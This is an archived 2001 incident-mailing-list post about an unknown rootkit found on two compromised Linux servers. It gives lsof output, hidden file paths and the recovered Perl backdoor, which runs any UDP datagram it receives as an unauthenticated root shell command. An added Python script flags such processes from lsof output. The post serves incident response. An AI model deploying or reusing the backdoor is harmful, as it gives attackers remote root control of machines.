Security Incidents mailing list archives

New rootkit?


From: UIA Security <securityman () uia net>
Date: Wed, 12 Dec 2001 09:17:19 -0800

Hi folks,

Had 2 comp'd boxes this morning running mandrake linux. Curiously, I can't find info on this rootkit anywhere. Anyone know it?



lsof -i:

.r00tsnif 11863 root    1u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tsnif 11863 root    2u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tsnif 11863 root    4u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    0u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    2u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    3u  IPv4 682409       UDP *:4816
.r00tshoc 11865 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tpass 11866 root    1u  IPv4 682146       TCP x:ssh->209.158.182.186:3510 (CLOSE)
.r00tpass 11866 root    2u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tpass 11866 root    3u  IPv4 682407       TCP *:9658 (LISTEN)
.r00tpass 11866 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00t     11869 root    3u  IPv4 682413       TCP *:65535 (LISTEN)
.r00t     11869 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00t     11872 root    3u  IPv4 682418       TCP *:31221 (LISTEN)
.r00t     11872 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root    0u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root    2u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)



new files:

/usr/lib/.r00t
/usr/lib/.r00t/.r00tshocky
/usr/lib/.r00t/.r00tpasswd
/usr/lib/.r00t/.r00t
/usr/man/man2/.r00tm0e



Some interesting strings:

Welcome to shocker AnD VorTexTK
  You are now r00t.
    Have phun..




/usr/lib/.r00t/.r00tshocky was a Perl script to listen for messages on UDP:

#!/usr/bin/perl
# Script as recovered from /usr/lib/.r00t/.r00tshocky; the comments were added
# when editing this post and are not part of the original file.

# Daemonize: fork, let the parent exit, and (below) detach the child from its
# controlling terminal so the listener survives the attacker logging out.
$pid=fork;
exit if $pid;
die("Error.") unless defined($pid);

use IO::Socket;   # also exports Socket's sockaddr_in() and AF_INET used below
use POSIX;
POSIX::setsid();
$time_to_die=0;

# INT, TERM and HUP only raise a flag; it is checked once per outer loop pass,
# i.e. only after the inner recv() loop ends, so the daemon is hard to kill politely.
sub signal_handler {
 $time_to_die=1;
}

$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;

until($time_to_die) {
$|=1;

$port=4816;        # matches the "UDP *:4816" socket of .r00tshoc in the lsof output above
$maxlen=1024;

my($sock, $raddr, $rhost);

# Bind UDP/4816 on all interfaces. The die string ("Merge deja", apparently Romanian
# for "already running") fires if the port is taken, e.g. by a second copy of this script.
$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.Merge deja\n");

# Every datagram received is executed verbatim as a shell command (backticks) with the
# privileges of the daemon, here root. There is no authentication; the sender's address
# is looked up but never checked.
while($sock->recv($msg, $maxlen)) {
print $msg;
 my($rport, $ipaddr)=sockaddr_in($sock->peername);
 $rhost=gethostbyaddr($ipaddr, AF_INET);
  $output=`$msg`;
  # IO::Socket's send() with no destination replies to the peer recorded by the last
  # recv(); the command output is followed by a separate "-end." datagram as a terminator.
  $sock->send($output);
  $sock->send("-end.");
}
}




...and of course a host of infected binaries.

Any thoughts?

--Liam
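Added editorial example, not part of Liam's post: a small triage script that parses `lsof -i` output and flags the two patterns visible in the listing above, dot-prefixed command names running as root and unexpected listeners on high ports (the UDP 4816 command socket and the TCP 9658/65535/31221 listeners). The sample lines are constructed from the post's listing with two benign daemons added for contrast; the allowlist of expected listeners and the port threshold are assumptions to be tuned per host.

```python
"""Triage helper for `lsof -i` output (editorial example, not from the original post)."""
from collections import namedtuple

Socket = namedtuple("Socket", "command pid user proto local remote state")

# Constructed sample: lines taken from the post's listing plus two benign daemons.
SAMPLE_LSOF = """\
.r00tsnif 11863 root    1u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    3u  IPv4 682409       UDP *:4816
.r00tpass 11866 root    3u  IPv4 682407       TCP *:9658 (LISTEN)
.r00t     11869 root    3u  IPv4 682413       TCP *:65535 (LISTEN)
.r00t     11872 root    3u  IPv4 682418       TCP *:31221 (LISTEN)
.r00tspin 11874 root    0u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
sshd       1234 root    3u  IPv4   5678       TCP *:ssh (LISTEN)
named       999 named   4u  IPv4   4321       UDP *:domain
"""

# Daemons expected to hold listening sockets on this box (assumption; tune per host).
EXPECTED_LISTENERS = {"sshd", "named", "httpd", "sendmail", "xinetd", "inetd"}
HIGH_PORT = 1024


def parse_lsof(text):
    """Parse `lsof -i` lines into Socket tuples.

    Columns are located by the TCP/UDP NODE token rather than by position, so the
    older layout in the post (no SIZE/OFF column) and newer lsof output both parse.
    """
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] == "COMMAND":
            continue
        try:
            node = next(i for i, f in enumerate(fields) if f in ("TCP", "UDP"))
        except StopIteration:
            continue
        name = fields[node + 1]
        state = fields[node + 2].strip("()") if len(fields) > node + 2 else ""
        local, _, remote = name.partition("->")
        sockets.append(Socket(fields[0], int(fields[1]), fields[2],
                              fields[node], local, remote, state))
    return sockets


def port_of(endpoint):
    """Numeric port of 'host:port', or None for a named service such as 'ssh'."""
    port = endpoint.rsplit(":", 1)[-1]
    return int(port) if port.isdigit() else None


def triage(sockets):
    """Return {pid: [reasons]} for sockets matching the rootkit's footprint."""
    findings = {}

    def flag(sock, why):
        findings.setdefault(sock.pid, []).append(why)

    for s in sockets:
        if s.command.startswith("."):
            flag(s, f"dot-prefixed command name {s.command!r}")
        # A UDP socket with no remote peer is effectively a listener.
        listening = s.state == "LISTEN" or (s.proto == "UDP" and not s.remote)
        if listening and s.command not in EXPECTED_LISTENERS:
            p = port_of(s.local)
            if p is not None and p >= HIGH_PORT:
                flag(s, f"{s.proto} listener on high port {p} owned by {s.user}")
    # Drop duplicate reasons (one process shows up once per descriptor).
    return {pid: list(dict.fromkeys(r)) for pid, r in findings.items()}


def suspicious_pids(text):
    """Sorted PIDs worth pulling /proc/<pid>/exe and cmdline for."""
    return sorted(triage(parse_lsof(text)))


if __name__ == "__main__":
    for pid, reasons in sorted(triage(parse_lsof(SAMPLE_LSOF)).items()):
        print(pid, "; ".join(reasons))
```

Feed it `lsof -i -n -P` so ports are numeric and no DNS lookups touch the wire; on a compromised host run a known-good static `lsof` from read-only media, since the post notes the installed binaries were trojaned and a tampered `lsof` would simply omit the `.r00t*` entries.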



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
